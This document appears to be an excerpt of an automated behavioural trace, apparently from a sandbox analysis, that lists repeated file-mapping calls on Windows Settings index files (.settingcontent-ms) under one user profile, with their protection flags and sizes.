Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Radio_IsAirplaneModeEnabled.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Radio_IsAirplaneModeEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2048 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_ShellMode_ModeChangeConfig.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_ShellMode_ModeChangeConfig.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2032 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_ShellMode_Preference.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_ShellMode_Preference.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2000 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_ShellMode_TaskbarAppsVisibility.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_ShellMode_TaskbarAppsVisibility.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2064 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_ShellMode_Toggle.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_ShellMode_Toggle.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1984 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Startup_AdvancedStartup.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Startup_AdvancedStartup.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2032 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Start_LinkToPlacesPage.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Start_LinkToPlacesPage.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2016 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Start_MoreTilesEnabled.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Start_MoreTilesEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2016 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Start_ShowRecentlyAddedAppsGroup.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Start_ShowRecentlyAddedAppsGroup.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2064 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Start_ShowSuggestedAppsGroup.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Start_ShowSuggestedAppsGroup.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2048 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Start_Size.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Start_Size.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1952 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Start_StoreMFUApps.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Start_StoreMFUApps.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1984 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Start_StoreRecentlyOpenedItems.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Start_StoreRecentlyOpenedItems.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2048 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_StorageSense_AppSizesOptionalComponentsLink-2.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_StorageSense_AppSizesOptionalComponentsLink-2.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2128 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_StorageSense_AppSizesOptionalComponentsLink-3.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_StorageSense_AppSizesOptionalComponentsLink-3.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2128 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_StorageSense_AppSizesOptionalComponentsLink.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_StorageSense_AppSizesOptionalComponentsLink.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2112 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_SyncSettings_SyncAccessibility_Toggle.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_SyncSettings_SyncAccessibility_Toggle.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2096 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_SyncSettings_SyncBrowserSettings_Toggle.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_SyncSettings_SyncBrowserSettings_Toggle.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2112 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_SyncSettings_SyncCredentials_Toggle.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_SyncSettings_SyncCredentials_Toggle.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2096 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_SyncSettings_SyncLanguage_Toggle.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_SyncSettings_SyncLanguage_Toggle.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2080 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_SyncSettings_SyncMaster_Toggle.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_SyncSettings_SyncMaster_Toggle.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2064 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_SyncSettings_SyncPersonalization_Toggle.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_SyncSettings_SyncPersonalization_Toggle.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2112 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_SyncSettings_Windows_Toggle.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_SyncSettings_Windows_Toggle.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2048 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Users_AddSecondaryWorkPin.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Users_AddSecondaryWorkPin.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2016 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Users_AssignedAccess.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Users_AssignedAccess.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2000 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Users_ChangePassword.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Users_ChangePassword.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2000 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Users_DelayLock.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Users_DelayLock.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1984 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Users_EnrollmentFace.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Users_EnrollmentFace.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2000 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Users_EnrollmentFingerprint.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Users_EnrollmentFingerprint.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2032 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Users_EnrollmentIris.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Users_EnrollmentIris.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2000 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Users_PicturePassword.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Users_PicturePassword.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2016 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Users_PINPassword.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Users_PINPassword.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1984 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Users_SingleSignOnAccountList.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Users_SingleSignOnAccountList.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2048 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_VirtualDesktops_AltTabFilter.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_VirtualDesktops_AltTabFilter.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2048 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_VirtualDesktops_TaskbarFilter.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_VirtualDesktops_TaskbarFilter.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2048 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Workplace_CorpDeviceManagement.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Workplace_CorpDeviceManagement.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2064 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Workplace_RelatedSettings.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Workplace_RelatedSettings.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2032 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AddOrRemovePrograms.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AddOrRemovePrograms.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1600 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{0042AE00-17CC-42EC-B5AD-B8F08A025D71}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{0042AE00-17CC-42EC-B5AD-B8F08A025D71}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1776 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{01ACC6BC-9A3D-49c5-AC7D-0FB9E026C424}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{01ACC6BC-9A3D-49c5-AC7D-0FB9E026C424}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1984 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{028DE9F5-65F3-4A06-A048-421056F3E421}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{028DE9F5-65F3-4A06-A048-421056F3E421}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1952 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{030C20F0-E20B-417A-B7AD-CEC6EE955CD3}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{030C20F0-E20B-417A-B7AD-CEC6EE955CD3}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1824 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{059ECE57-19D1-4112-B05C-86F8ED5DA6B0}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{059ECE57-19D1-4112-B05C-86F8ED5DA6B0}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1728 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{06628900-13DD-4fc3-A18B-0E9CE7B663ED}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{06628900-13DD-4fc3-A18B-0E9CE7B663ED}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1904 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{06D12455-F35D-44D6-8E00-3F6A360CC030}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{06D12455-F35D-44D6-8E00-3F6A360CC030}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1792 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{06FF5AE9-8F7C-41AD-B71B-62137DE26715}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{06FF5AE9-8F7C-41AD-B71B-62137DE26715}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1760 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{082594D9-8481-43F0-AE8F-62EA920A4220}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{082594D9-8481-43F0-AE8F-62EA920A4220}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1760 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{083D5202-600A-4f38-981B-2D138FBDC4D1}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{083D5202-600A-4f38-981B-2D138FBDC4D1}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1936 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{08D48377-1C06-416D-B382-61E8D5F6CD18}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{08D48377-1C06-416D-B382-61E8D5F6CD18}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1792 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{08EB53B7-3384-473A-8D2C-6C0E71F3BF34}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{08EB53B7-3384-473A-8D2C-6C0E71F3BF34}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1744 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\classic_{09bf6a57-7bf7-4389-8d6f-2bcf6a26bb4e}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\classic_{09bf6a57-7bf7-4389-8d6f-2bcf6a26bb4e}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1728 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{0CDC534D-A9FF-450D-91D8-96C341ED44AA}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{0CDC534D-A9FF-450D-91D8-96C341ED44AA}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1744 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{0df44eaa-ff21-4412-828e-260a8728e7f1}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{0df44eaa-ff21-4412-828e-260a8728e7f1}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1584 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{0DF721FA-F921-4416-A491-1924F212C705}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{0DF721FA-F921-4416-A491-1924F212C705}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1744 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{0e1d43a6-f261-491c-84ea-8bfcc6a4b70b}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{0e1d43a6-f261-491c-84ea-8bfcc6a4b70b}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1696 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{0F1B68F6-B72D-4229-BC9C-A87F0B16B17B}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{0F1B68F6-B72D-4229-BC9C-A87F0B16B17B}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1984 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{1011988D-12F9-446b-85FF-A1579CCD1678}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{1011988D-12F9-446b-85FF-A1579CCD1678}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1792 True 1
Fn
